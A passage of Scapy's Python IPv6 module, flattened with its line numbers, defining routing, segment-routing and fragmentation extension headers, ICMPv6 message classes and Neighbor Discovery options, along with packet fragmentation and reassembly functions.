length_from = lambda pkt: (8*(pkt.len+1))-2) ] 974 overload_fields = {IPv6: { "nh": 60 }} 975 976 977############################# Routing Header ################################ 978 979class IPv6ExtHdrRouting(_IPv6ExtHdr): 980 name = "IPv6 Option Header Routing" 981 fields_desc = [ ByteEnumField("nh", 59, ipv6nh), 982 FieldLenField("len", None, count_of="addresses", fmt="B", 983 adjust = lambda pkt,x:2*x), # in 8 bytes blocks 984 ByteField("type", 0), 985 ByteField("segleft", None), 986 BitField("reserved", 0, 32), # There is meaning in this field ... 987 IP6ListField("addresses", [], 988 length_from = lambda pkt: 8*pkt.len)] 989 overload_fields = {IPv6: { "nh": 43 }} 990 991 def post_build(self, pkt, pay): 992 if self.segleft is None: 993 pkt = pkt[:3]+struct.pack("B", len(self.addresses))+pkt[4:] 994 return _IPv6ExtHdr.post_build(self, pkt, pay) 995 996 997######################### Segment Routing Header ############################ 998 999# This implementation is based on draft 06, available at: 1000# https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06 1001 1002class IPv6ExtHdrSegmentRoutingTLV(Packet): 1003 name = "IPv6 Option Header Segment Routing - Generic TLV" 1004 fields_desc = [ ByteField("type", 0), 1005 ByteField("len", 0), 1006 ByteField("reserved", 0), 1007 ByteField("flags", 0), 1008 StrLenField("value", "", length_from=lambda pkt: pkt.len) ] 1009 1010 def extract_padding(self, p): 1011 return b"",p 1012 1013 registered_sr_tlv = {} 1014 @classmethod 1015 def register_variant(cls): 1016 cls.registered_sr_tlv[cls.type.default] = cls 1017 1018 @classmethod 1019 def dispatch_hook(cls, pkt=None, *args, **kargs): 1020 if pkt: 1021 tmp_type = orb(pkt[0]) 1022 return cls.registered_sr_tlv.get(tmp_type, cls) 1023 return cls 1024 1025 1026class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV): 1027 name = "IPv6 Option Header Segment Routing - Ingress Node TLV" 1028 fields_desc = [ ByteField("type", 1), 1029 ByteField("len", 18), 1030 ByteField("reserved", 0), 1031 ByteField("flags", 0), 1032 IP6Field("ingress_node", "::1") ] 1033 1034 1035class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV): 1036 name = "IPv6 Option Header Segment Routing - Egress Node TLV" 1037 fields_desc = [ ByteField("type", 2), 1038 ByteField("len", 18), 1039 ByteField("reserved", 0), 1040 ByteField("flags", 0), 1041 IP6Field("egress_node", "::1") ] 1042 1043 1044class IPv6ExtHdrSegmentRoutingTLVPadding(IPv6ExtHdrSegmentRoutingTLV): 1045 name = "IPv6 Option Header Segment Routing - Padding TLV" 1046 fields_desc = [ ByteField("type", 4), 1047 FieldLenField("len", None, length_of="padding", fmt="B"), 1048 StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len) ] 1049 1050 1051class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr): 1052 name = "IPv6 Option Header Segment Routing" 1053 fields_desc = [ ByteEnumField("nh", 59, ipv6nh), 1054 ByteField("len", None), 1055 ByteField("type", 4), 1056 ByteField("segleft", None), 1057 ByteField("lastentry", None), 1058 BitField("unused1", 0, 1), 1059 BitField("protected", 0, 1), 1060 BitField("oam", 0, 1), 1061 BitField("alert", 0, 1), 1062 BitField("hmac", 0, 1), 1063 BitField("unused2", 0, 3), 1064 ShortField("tag", 0), 1065 IP6ListField("addresses", ["::1"], 1066 count_from=lambda pkt: pkt.lastentry), 1067 PacketListField("tlv_objects", [], IPv6ExtHdrSegmentRoutingTLV, 1068 length_from=lambda pkt: 8*pkt.len - 16*pkt.lastentry) ] 1069 1070 overload_fields = { IPv6: { "nh": 43 } } 1071 1072 def post_build(self, pkt, pay): 1073 1074 if self.len is None: 1075 1076 # The extension must be align on 8 bytes 1077 tmp_mod = (len(pkt) - 8) % 8 1078 if tmp_mod == 1: 1079 warning("IPv6ExtHdrSegmentRouting(): can't pad 1 byte !") 1080 elif tmp_mod >= 2: 1081 #Add the padding extension 1082 tmp_pad = b"\x00" * (tmp_mod-2) 1083 tlv = IPv6ExtHdrSegmentRoutingTLVPadding(padding=tmp_pad) 1084 pkt += raw(tlv) 1085 1086 tmp_len = (len(pkt) - 8) // 8 1087 pkt = pkt[:1] + struct.pack("B", tmp_len)+ pkt[2:] 1088 1089 if self.segleft is None: 1090 tmp_len = len(self.addresses) 1091 if tmp_len: 1092 tmp_len -= 1 1093 pkt = pkt[:3] + struct.pack("B", tmp_len) + pkt[4:] 1094 1095 if self.lastentry is None: 1096 pkt = pkt[:4] + struct.pack("B", len(self.addresses)) + pkt[5:] 1097 1098 return _IPv6ExtHdr.post_build(self, pkt, pay) 1099 1100 1101########################### Fragmentation Header ############################ 1102 1103class IPv6ExtHdrFragment(_IPv6ExtHdr): 1104 name = "IPv6 Extension Header - Fragmentation header" 1105 fields_desc = [ ByteEnumField("nh", 59, ipv6nh), 1106 BitField("res1", 0, 8), 1107 BitField("offset", 0, 13), 1108 BitField("res2", 0, 2), 1109 BitField("m", 0, 1), 1110 IntField("id", None) ] 1111 overload_fields = {IPv6: { "nh": 44 }} 1112 1113 1114def defragment6(packets): 1115 """ 1116 Performs defragmentation of a list of IPv6 packets. Packets are reordered. 1117 Crap is dropped. What lacks is completed by 'X' characters. 1118 """ 1119 1120 l = [x for x in packets if IPv6ExtHdrFragment in x] # remove non fragments 1121 if not l: 1122 return [] 1123 1124 id = l[0][IPv6ExtHdrFragment].id 1125 1126 llen = len(l) 1127 l = [x for x in l if x[IPv6ExtHdrFragment].id == id] 1128 if len(l) != llen: 1129 warning("defragment6: some fragmented packets have been removed from list") 1130 llen = len(l) 1131 1132 # reorder fragments 1133 res = [] 1134 while l: 1135 min_pos = 0 1136 min_offset = l[0][IPv6ExtHdrFragment].offset 1137 for p in l: 1138 cur_offset = p[IPv6ExtHdrFragment].offset 1139 if cur_offset < min_offset: 1140 min_pos = 0 1141 min_offset = cur_offset 1142 res.append(l[min_pos]) 1143 del(l[min_pos]) 1144 1145 # regenerate the fragmentable part 1146 fragmentable = b"" 1147 for p in res: 1148 q=p[IPv6ExtHdrFragment] 1149 offset = 8*q.offset 1150 if offset != len(fragmentable): 1151 warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset)) 1152 fragmentable += b"X"*(offset - len(fragmentable)) 1153 fragmentable += raw(q.payload) 1154 1155 # Regenerate the unfragmentable part. 1156 q = res[0] 1157 nh = q[IPv6ExtHdrFragment].nh 1158 q[IPv6ExtHdrFragment].underlayer.nh = nh 1159 del q[IPv6ExtHdrFragment].underlayer.payload 1160 q /= conf.raw_layer(load=fragmentable) 1161 1162 return IPv6(raw(q)) 1163 1164 1165def fragment6(pkt, fragSize): 1166 """ 1167 Performs fragmentation of an IPv6 packet. Provided packet ('pkt') must already 1168 contain an IPv6ExtHdrFragment() class. 'fragSize' argument is the expected 1169 maximum size of fragments (MTU). The list of packets is returned. 1170 1171 If packet does not contain an IPv6ExtHdrFragment class, it is returned in 1172 result list. 1173 """ 1174 1175 pkt = pkt.copy() 1176 1177 if not IPv6ExtHdrFragment in pkt: 1178 # TODO : automatically add a fragment before upper Layer 1179 # at the moment, we do nothing and return initial packet 1180 # as single element of a list 1181 return [pkt] 1182 1183 # If the payload is bigger than 65535, a Jumbo payload must be used, as 1184 # an IPv6 packet can't be bigger than 65535 bytes. 1185 if len(raw(pkt[IPv6ExtHdrFragment])) > 65535: 1186 warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.") 1187 return [] 1188 1189 s = raw(pkt) # for instantiation to get upper layer checksum right 1190 1191 if len(s) <= fragSize: 1192 return [pkt] 1193 1194 # Fragmentable part : fake IPv6 for Fragmentable part length computation 1195 fragPart = pkt[IPv6ExtHdrFragment].payload 1196 tmp = raw(IPv6(src="::1", dst="::1")/fragPart) 1197 fragPartLen = len(tmp) - 40 # basic IPv6 header length 1198 fragPartStr = s[-fragPartLen:] 1199 1200 # Grab Next Header for use in Fragment Header 1201 nh = pkt[IPv6ExtHdrFragment].nh 1202 1203 # Keep fragment header 1204 fragHeader = pkt[IPv6ExtHdrFragment] 1205 del fragHeader.payload # detach payload 1206 1207 # Unfragmentable Part 1208 unfragPartLen = len(s) - fragPartLen - 8 1209 unfragPart = pkt 1210 del pkt[IPv6ExtHdrFragment].underlayer.payload # detach payload 1211 1212 # Cut the fragmentable part to fit fragSize. Inner fragments have 1213 # a length that is an integer multiple of 8 octets. last Frag MTU 1214 # can be anything below MTU 1215 lastFragSize = fragSize - unfragPartLen - 8 1216 innerFragSize = lastFragSize - (lastFragSize % 8) 1217 1218 if lastFragSize <= 0 or innerFragSize == 0: 1219 warning("Provided fragment size value is too low. " + 1220 "Should be more than %d" % (unfragPartLen + 8)) 1221 return [unfragPart/fragHeader/fragPart] 1222 1223 remain = fragPartStr 1224 res = [] 1225 fragOffset = 0 # offset, incremeted during creation 1226 fragId = random.randint(0,0xffffffff) # random id ... 1227 if fragHeader.id is not None: # ... except id provided by user 1228 fragId = fragHeader.id 1229 fragHeader.m = 1 1230 fragHeader.id = fragId 1231 fragHeader.nh = nh 1232 1233 # Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ... 1234 while True: 1235 if (len(remain) > lastFragSize): 1236 tmp = remain[:innerFragSize] 1237 remain = remain[innerFragSize:] 1238 fragHeader.offset = fragOffset # update offset 1239 fragOffset += (innerFragSize // 8) # compute new one 1240 if IPv6 in unfragPart: 1241 unfragPart[IPv6].plen = None 1242 tempo = unfragPart/fragHeader/conf.raw_layer(load=tmp) 1243 res.append(tempo) 1244 else: 1245 fragHeader.offset = fragOffset # update offSet 1246 fragHeader.m = 0 1247 if IPv6 in unfragPart: 1248 unfragPart[IPv6].plen = None 1249 tempo = unfragPart/fragHeader/conf.raw_layer(load=remain) 1250 res.append(tempo) 1251 break 1252 return res 1253 1254 1255############################### AH Header ################################### 1256 1257# class _AHFieldLenField(FieldLenField): 1258# def getfield(self, pkt, s): 1259# l = getattr(pkt, self.fld) 1260# l = (l*8)-self.shift 1261# i = self.m2i(pkt, s[:l]) 1262# return s[l:],i 1263 1264# class _AHICVStrLenField(StrLenField): 1265# def i2len(self, pkt, x): 1266 1267 1268 1269# class IPv6ExtHdrAH(_IPv6ExtHdr): 1270# name = "IPv6 Extension Header - AH" 1271# fields_desc = [ ByteEnumField("nh", 59, ipv6nh), 1272# _AHFieldLenField("len", None, "icv"), 1273# ShortField("res", 0), 1274# IntField("spi", 0), 1275# IntField("sn", 0), 1276# _AHICVStrLenField("icv", None, "len", shift=2) ] 1277# overload_fields = {IPv6: { "nh": 51 }} 1278 1279# def post_build(self, pkt, pay): 1280# if self.len is None: 1281# pkt = pkt[0]+struct.pack("!B", 2*len(self.addresses))+pkt[2:] 1282# if self.segleft is None: 1283# pkt = pkt[:3]+struct.pack("!B", len(self.addresses))+pkt[4:] 1284# return _IPv6ExtHdr.post_build(self, pkt, pay) 1285 1286 1287############################### ESP Header ################################## 1288 1289# class IPv6ExtHdrESP(_IPv6extHdr): 1290# name = "IPv6 Extension Header - ESP" 1291# fields_desc = [ IntField("spi", 0), 1292# IntField("sn", 0), 1293# # there is things to extract from IKE work 1294# ] 1295# overloads_fields = {IPv6: { "nh": 50 }} 1296 1297 1298 1299############################################################################# 1300############################################################################# 1301### ICMPv6* Classes ### 1302############################################################################# 1303############################################################################# 1304 1305icmp6typescls = { 1: "ICMPv6DestUnreach", 1306 2: "ICMPv6PacketTooBig", 1307 3: "ICMPv6TimeExceeded", 1308 4: "ICMPv6ParamProblem", 1309 128: "ICMPv6EchoRequest", 1310 129: "ICMPv6EchoReply", 1311 130: "ICMPv6MLQuery", 1312 131: "ICMPv6MLReport", 1313 132: "ICMPv6MLDone", 1314 133: "ICMPv6ND_RS", 1315 134: "ICMPv6ND_RA", 1316 135: "ICMPv6ND_NS", 1317 136: "ICMPv6ND_NA", 1318 137: "ICMPv6ND_Redirect", 1319 #138: Do Me - RFC 2894 - Seems painful 1320 139: "ICMPv6NIQuery", 1321 140: "ICMPv6NIReply", 1322 141: "ICMPv6ND_INDSol", 1323 142: "ICMPv6ND_INDAdv", 1324 #143: Do Me - RFC 3810 1325 144: "ICMPv6HAADRequest", 1326 145: "ICMPv6HAADReply", 1327 146: "ICMPv6MPSol", 1328 147: "ICMPv6MPAdv", 1329 #148: Do Me - SEND related - RFC 3971 1330 #149: Do Me - SEND related - RFC 3971 1331 151: "ICMPv6MRD_Advertisement", 1332 152: "ICMPv6MRD_Solicitation", 1333 153: "ICMPv6MRD_Termination", 1334 } 1335 1336icmp6typesminhdrlen = { 1: 8, 1337 2: 8, 1338 3: 8, 1339 4: 8, 1340 128: 8, 1341 129: 8, 1342 130: 24, 1343 131: 24, 1344 132: 24, 1345 133: 8, 1346 134: 16, 1347 135: 24, 1348 136: 24, 1349 137: 40, 1350 #139: 1351 #140 1352 141: 8, 1353 142: 8, 1354 144: 8, 1355 145: 8, 1356 146: 8, 1357 147: 8, 1358 151: 8, 1359 152: 4, 1360 153: 4 1361 } 1362 1363icmp6types = { 1 : "Destination unreachable", 1364 2 : "Packet too big", 1365 3 : "Time exceeded", 1366 4 : "Parameter problem", 1367 100 : "Private Experimentation", 1368 101 : "Private Experimentation", 1369 128 : "Echo Request", 1370 129 : "Echo Reply", 1371 130 : "MLD Query", 1372 131 : "MLD Report", 1373 132 : "MLD Done", 1374 133 : "Router Solicitation", 1375 134 : "Router Advertisement", 1376 135 : "Neighbor Solicitation", 1377 136 : "Neighbor Advertisement", 1378 137 : "Redirect Message", 1379 138 : "Router Renumbering", 1380 139 : "ICMP Node Information Query", 1381 140 : "ICMP Node Information Response", 1382 141 : "Inverse Neighbor Discovery Solicitation Message", 1383 142 : "Inverse Neighbor Discovery Advertisement Message", 1384 143 : "Version 2 Multicast Listener Report", 1385 144 : "Home Agent Address Discovery Request Message", 1386 145 : "Home Agent Address Discovery Reply Message", 1387 146 : "Mobile Prefix Solicitation", 1388 147 : "Mobile Prefix Advertisement", 1389 148 : "Certification Path Solicitation", 1390 149 : "Certification Path Advertisement", 1391 151 : "Multicast Router Advertisement", 1392 152 : "Multicast Router Solicitation", 1393 153 : "Multicast Router Termination", 1394 200 : "Private Experimentation", 1395 201 : "Private Experimentation" } 1396 1397 1398class _ICMPv6(Packet): 1399 name = "ICMPv6 dummy class" 1400 overload_fields = {IPv6: {"nh": 58}} 1401 def post_build(self, p, pay): 1402 p += pay 1403 if self.cksum == None: 1404 chksum = in6_chksum(58, self.underlayer, p) 1405 p = p[:2]+struct.pack("!H", chksum)+p[4:] 1406 return p 1407 1408 def hashret(self): 1409 return self.payload.hashret() 1410 1411 def answers(self, other): 1412 # isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ... 1413 if (isinstance(self.underlayer, IPerror6) or 1414 isinstance(self.underlayer, _IPv6ExtHdr) and 1415 isinstance(other, _ICMPv6)): 1416 if not ((self.type == other.type) and 1417 (self.code == other.code)): 1418 return 0 1419 return 1 1420 return 0 1421 1422 1423class _ICMPv6Error(_ICMPv6): 1424 name = "ICMPv6 errors dummy class" 1425 def guess_payload_class(self,p): 1426 return IPerror6 1427 1428class ICMPv6Unknown(_ICMPv6): 1429 name = "Scapy6 ICMPv6 fallback class" 1430 fields_desc = [ ByteEnumField("type",1, icmp6types), 1431 ByteField("code",0), 1432 XShortField("cksum", None), 1433 StrField("msgbody", "")] 1434 1435 1436################################## RFC 2460 ################################# 1437 1438class ICMPv6DestUnreach(_ICMPv6Error): 1439 name = "ICMPv6 Destination Unreachable" 1440 fields_desc = [ ByteEnumField("type",1, icmp6types), 1441 ByteEnumField("code",0, { 0: "No route to destination", 1442 1: "Communication with destination administratively prohibited", 1443 2: "Beyond scope of source address", 1444 3: "Address unreachable", 1445 4: "Port unreachable" }), 1446 XShortField("cksum", None), 1447 ByteField("length", 0), 1448 X3BytesField("unused",0)] 1449 1450class ICMPv6PacketTooBig(_ICMPv6Error): 1451 name = "ICMPv6 Packet Too Big" 1452 fields_desc = [ ByteEnumField("type",2, icmp6types), 1453 ByteField("code",0), 1454 XShortField("cksum", None), 1455 IntField("mtu",1280)] 1456 1457class ICMPv6TimeExceeded(_ICMPv6Error): 1458 name = "ICMPv6 Time Exceeded" 1459 fields_desc = [ ByteEnumField("type",3, icmp6types), 1460 ByteEnumField("code",0, { 0: "hop limit exceeded in transit", 1461 1: "fragment reassembly time exceeded"}), 1462 XShortField("cksum", None), 1463 ByteField("length", 0), 1464 X3BytesField("unused",0)] 1465 1466# The default pointer value is set to the next header field of 1467# the encapsulated IPv6 packet 1468class ICMPv6ParamProblem(_ICMPv6Error): 1469 name = "ICMPv6 Parameter Problem" 1470 fields_desc = [ ByteEnumField("type",4, icmp6types), 1471 ByteEnumField("code",0, {0: "erroneous header field encountered", 1472 1: "unrecognized Next Header type encountered", 1473 2: "unrecognized IPv6 option encountered"}), 1474 XShortField("cksum", None), 1475 IntField("ptr",6)] 1476 1477class ICMPv6EchoRequest(_ICMPv6): 1478 name = "ICMPv6 Echo Request" 1479 fields_desc = [ ByteEnumField("type", 128, icmp6types), 1480 ByteField("code", 0), 1481 XShortField("cksum", None), 1482 XShortField("id",0), 1483 XShortField("seq",0), 1484 StrField("data", "")] 1485 def mysummary(self): 1486 return self.sprintf("%name% (id: %id% seq: %seq%)") 1487 def hashret(self): 1488 return struct.pack("HH",self.id,self.seq)+self.payload.hashret() 1489 1490 1491class ICMPv6EchoReply(ICMPv6EchoRequest): 1492 name = "ICMPv6 Echo Reply" 1493 type = 129 1494 def answers(self, other): 1495 # We could match data content between request and reply. 1496 return (isinstance(other, ICMPv6EchoRequest) and 1497 self.id == other.id and self.seq == other.seq and 1498 self.data == other.data) 1499 1500 1501############ ICMPv6 Multicast Listener Discovery (RFC3810) ################## 1502 1503# tous les messages MLD sont emis avec une adresse source lien-locale 1504# -> Y veiller dans le post_build si aucune n'est specifiee 1505# La valeur de Hop-Limit doit etre de 1 1506# "and an IPv6 Router Alert option in a Hop-by-Hop Options 1507# header. (The router alert option is necessary to cause routers to 1508# examine MLD messages sent to multicast addresses in which the router 1509# itself has no interest" 1510class _ICMPv6ML(_ICMPv6): 1511 fields_desc = [ ByteEnumField("type", 130, icmp6types), 1512 ByteField("code", 0), 1513 XShortField("cksum", None), 1514 ShortField("mrd", 0), 1515 ShortField("reserved", 0), 1516 IP6Field("mladdr","::")] 1517 1518# general queries are sent to the link-scope all-nodes multicast 1519# address ff02::1, with a multicast address field of 0 and a MRD of 1520# [Query Response Interval] 1521# Default value for mladdr is set to 0 for a General Query, and 1522# overloaded by the user for a Multicast Address specific query 1523# TODO : See what we can do to automatically include a Router Alert 1524# Option in a Destination Option Header. 1525class ICMPv6MLQuery(_ICMPv6ML): # RFC 2710 1526 name = "MLD - Multicast Listener Query" 1527 type = 130 1528 mrd = 10000 # 10s for mrd 1529 mladdr = "::" 1530 overload_fields = {IPv6: { "dst": "ff02::1", "hlim": 1, "nh": 58 }} 1531 def hashret(self): 1532 if self.mladdr != "::": 1533 return ( 1534 inet_pton(socket.AF_INET6, self.mladdr) + self.payload.hashret() 1535 ) 1536 else: 1537 return self.payload.hashret() 1538 1539 1540# TODO : See what we can do to automatically include a Router Alert 1541# Option in a Destination Option Header. 1542class ICMPv6MLReport(_ICMPv6ML): # RFC 2710 1543 name = "MLD - Multicast Listener Report" 1544 type = 131 1545 overload_fields = {IPv6: {"hlim": 1, "nh": 58}} 1546 # implementer le hashret et le answers 1547 1548# When a node ceases to listen to a multicast address on an interface, 1549# it SHOULD send a single Done message to the link-scope all-routers 1550# multicast address (FF02::2), carrying in its multicast address field 1551# the address to which it is ceasing to listen 1552# TODO : See what we can do to automatically include a Router Alert 1553# Option in a Destination Option Header. 1554class ICMPv6MLDone(_ICMPv6ML): # RFC 2710 1555 name = "MLD - Multicast Listener Done" 1556 type = 132 1557 overload_fields = {IPv6: { "dst": "ff02::2", "hlim": 1, "nh": 58}} 1558 1559 1560########## ICMPv6 MRD - Multicast Router Discovery (RFC 4286) ############### 1561 1562# TODO: 1563# - 04/09/06 troglocan : find a way to automatically add a router alert 1564# option for all MRD packets. This could be done in a specific 1565# way when IPv6 is the under layer with some specific keyword 1566# like 'exthdr'. This would allow to keep compatibility with 1567# providing IPv6 fields to be overloaded in fields_desc. 1568# 1569# At the moment, if user inserts an IPv6 Router alert option 1570# none of the IPv6 default values of IPv6 layer will be set. 1571 1572class ICMPv6MRD_Advertisement(_ICMPv6): 1573 name = "ICMPv6 Multicast Router Discovery Advertisement" 1574 fields_desc = [ByteEnumField("type", 151, icmp6types), 1575 ByteField("advinter", 20), 1576 XShortField("cksum", None), 1577 ShortField("queryint", 0), 1578 ShortField("robustness", 0)] 1579 overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::2"}} 1580 # IPv6 Router Alert requires manual inclusion 1581 def extract_padding(self, s): 1582 return s[:8], s[8:] 1583 1584class ICMPv6MRD_Solicitation(_ICMPv6): 1585 name = "ICMPv6 Multicast Router Discovery Solicitation" 1586 fields_desc = [ByteEnumField("type", 152, icmp6types), 1587 ByteField("res", 0), 1588 XShortField("cksum", None) ] 1589 overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::2"}} 1590 # IPv6 Router Alert requires manual inclusion 1591 def extract_padding(self, s): 1592 return s[:4], s[4:] 1593 1594class ICMPv6MRD_Termination(_ICMPv6): 1595 name = "ICMPv6 Multicast Router Discovery Termination" 1596 fields_desc = [ByteEnumField("type", 153, icmp6types), 1597 ByteField("res", 0), 1598 XShortField("cksum", None) ] 1599 overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::6A"}} 1600 # IPv6 Router Alert requires manual inclusion 1601 def extract_padding(self, s): 1602 return s[:4], s[4:] 1603 1604 1605################### ICMPv6 Neighbor Discovery (RFC 2461) #################### 1606 1607icmp6ndopts = { 1: "Source Link-Layer Address", 1608 2: "Target Link-Layer Address", 1609 3: "Prefix Information", 1610 4: "Redirected Header", 1611 5: "MTU", 1612 6: "NBMA Shortcut Limit Option", # RFC2491 1613 7: "Advertisement Interval Option", 1614 8: "Home Agent Information Option", 1615 9: "Source Address List", 1616 10: "Target Address List", 1617 11: "CGA Option", # RFC 3971 1618 12: "RSA Signature Option", # RFC 3971 1619 13: "Timestamp Option", # RFC 3971 1620 14: "Nonce option", # RFC 3971 1621 15: "Trust Anchor Option", # RFC 3971 1622 16: "Certificate Option", # RFC 3971 1623 17: "IP Address Option", # RFC 4068 1624 18: "New Router Prefix Information Option", # RFC 4068 1625 19: "Link-layer Address Option", # RFC 4068 1626 20: "Neighbor Advertisement Acknowledgement Option", 1627 21: "CARD Request Option", # RFC 4065/4066/4067 1628 22: "CARD Reply Option", # RFC 4065/4066/4067 1629 23: "MAP Option", # RFC 4140 1630 24: "Route Information Option", # RFC 4191 1631 25: "Recusive DNS Server Option", 1632 26: "IPv6 Router Advertisement Flags Option" 1633 } 1634 1635icmp6ndoptscls = { 1: "ICMPv6NDOptSrcLLAddr", 1636 2: "ICMPv6NDOptDstLLAddr", 1637 3: "ICMPv6NDOptPrefixInfo", 1638 4: "ICMPv6NDOptRedirectedHdr", 1639 5: "ICMPv6NDOptMTU", 1640 6: "ICMPv6NDOptShortcutLimit", 1641 7: "ICMPv6NDOptAdvInterval", 1642 8: "ICMPv6NDOptHAInfo", 1643 9: "ICMPv6NDOptSrcAddrList", 1644 10: "ICMPv6NDOptTgtAddrList", 1645 #11: Do Me, 1646 #12: Do Me, 1647 #13: Do Me, 1648 #14: Do Me, 1649 #15: Do Me, 1650 #16: Do Me, 1651 17: "ICMPv6NDOptIPAddr", 1652 18: "ICMPv6NDOptNewRtrPrefix", 1653 19: "ICMPv6NDOptLLA", 1654 #18: Do Me, 1655 #19: Do Me, 1656 #20: Do Me, 1657 #21: Do Me, 1658 #22: Do Me, 1659 23: "ICMPv6NDOptMAP", 1660 24: "ICMPv6NDOptRouteInfo", 1661 25: "ICMPv6NDOptRDNSS", 1662 26: "ICMPv6NDOptEFA", 1663 31: "ICMPv6NDOptDNSSL" 1664 } 1665 1666class _ICMPv6NDGuessPayload: 1667 name = "Dummy ND class that implements guess_payload_class()" 1668 def guess_payload_class(self,p): 1669 if len(p) > 1: 1670 return get_cls(icmp6ndoptscls.get(orb(p[0]),"Raw"), "Raw") # s/Raw/ICMPv6NDOptUnknown/g ? 1671 1672 1673# Beginning of ICMPv6 Neighbor Discovery Options. 1674 1675class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet): 1676 name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented" 1677 fields_desc = [ ByteField("type",None), 1678 FieldLenField("len",None,length_of="data",fmt="B", 1679 adjust = lambda pkt,x: x+2), 1680 StrLenField("data","", 1681 length_from = lambda pkt: pkt.len-2) ] 1682 1683# NOTE: len includes type and len field. Expressed in unit of 8 bytes 1684# TODO: Revoir le coup du ETHER_ANY 1685class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet): 1686 name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address" 1687 fields_desc = [ ByteField("type", 1), 1688 ByteField("len", 1), 1689 MACField("lladdr", ETHER_ANY) ] 1690 def mysummary(self): 1691 return self.sprintf("%name% %lladdr%") 1692 1693class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr): 1694 name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address" 1695 type = 2 1696 1697class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet): 1698 name = "ICMPv6 Neighbor Discovery Option - Prefix Information" 1699 fields_desc = [ ByteField("type",3), 1700 ByteField("len",4), 1701 ByteField("prefixlen",None), 1702 BitField("L",1,1), 1703 BitField("A",1,1), 1704 BitField("R",0,1), 1705 BitField("res1",0,5), 1706 XIntField("validlifetime",0xffffffff), 1707 XIntField("preferredlifetime",0xffffffff), 1708 XIntField("res2",0x00000000), 1709 IP6Field("prefix","::") ] 1710 def mysummary(self): 1711 return self.sprintf("%name% %prefix%") 1712 1713# TODO: We should also limit the size of included packet to something 1714# like (initiallen - 40 - 2) 1715class TruncPktLenField(PacketLenField): 1716 __slots__ = ["cur_shift"] 1717 1718 def __init__(self, name, default, cls, cur_shift, length_from=None, shift=0): 1719 PacketLenField.__init__(self, name, default, cls, length_from=length_from) 1720 self.cur_shift = cur_shift 1721 1722 def getfield(self, pkt, s): 1723 l = self.length_from(pkt) 1724 i = self.m2i(pkt, s[:l]) 1725 return s[l:],i 1726 1727 def m2i(self, pkt, m): 1728 s = None 1729 try: # It can happen we have sth shorter than 40 bytes 1730 s = self.cls(m) 1731 except: 1732 return conf.raw_layer(m) 1733 return s 1734 1735 def i2m(self, pkt, x): 1736 s = raw(x) 1737 l = len(s) 1738 r = (l + self.cur_shift) % 8 1739 l = l - r 1740 return s[:l] 1741 1742 def i2len(self, pkt, i): 1743 return len(self.i2m(pkt, i)) 1744 1745 1746# Faire un post_build pour le recalcul de la taille (en multiple de 8 octets) 1747class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet): 1748 name = "ICMPv6 Neighbor Discovery Option - Redirected Header" 1749 fields_desc = [ ByteField("type",4), 1750 FieldLenField("len", None, length_of="pkt", fmt="B", 1751 adjust = lambda pkt,x:(x+8)//8), 1752 StrFixedLenField("res", b"\x00"*6, 6), 1753 TruncPktLenField("pkt", b"", IPv6, 8, 1754 length_from = lambda pkt: 8*pkt.len-8) ] 1755 1756# See which value should be used for default MTU instead of 1280 1757class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet): 1758 name = "ICMPv6 Neighbor Discovery Option - MTU" 1759 fields_desc = [ ByteField("type",5), 1760 ByteField("len",1), 1761 XShortField("res",0), 1762 IntField("mtu",1280)] 1763 1764class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet): # RFC 2491 1765 name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit" 1766 fields_desc = [ ByteField("type", 6), 1767 ByteField("len", 1), 1768 ByteField("shortcutlim", 40), # XXX 1769 ByteField("res1", 0), 1770 IntField("res2", 0) ] 1771 1772class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet): 1773 name = "ICMPv6 Neighbor Discovery - Interval Advertisement" 1774 fields_desc = [ ByteField("type",7), 1775 ByteField("len",1), 1776 ShortField("res", 0), 1777 IntField("advint", 0) ] 1778 def mysummary(self): 1779 return self.sprintf("%name% %advint% milliseconds") 1780 1781class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet): 1782 name = "ICMPv6 Neighbor Discovery - Home Agent Information" 1783 fields_desc = [ ByteField("type",8), 1784 ByteField("len",1), 1785 ShortField("res", 0), 1786 ShortField("pref", 0), 1787 ShortField("lifetime", 1)] 1788 def mysummary(self): 1789 return self.sprintf("%name% %pref% %lifetime% seconds") 1790 1791# type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support 1792 1793# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support 1794 1795class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet): # RFC 4068 1796 name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)" 1797 fields_desc = [ ByteField("type",17), 1798 ByteField("len", 3), 1799 ByteEnumField("optcode", 1, {1: "Old Care-Of Address", 1800 2: "New Care-Of Address", 1801 3: "NAR's IP address" }), 1802 ByteField("plen", 64), 1803 IntField("res", 0), 1804 IP6Field("addr", "::") ] 1805 1806class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet): # RFC 4068 1807 name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)" 1808 fields_desc = [ 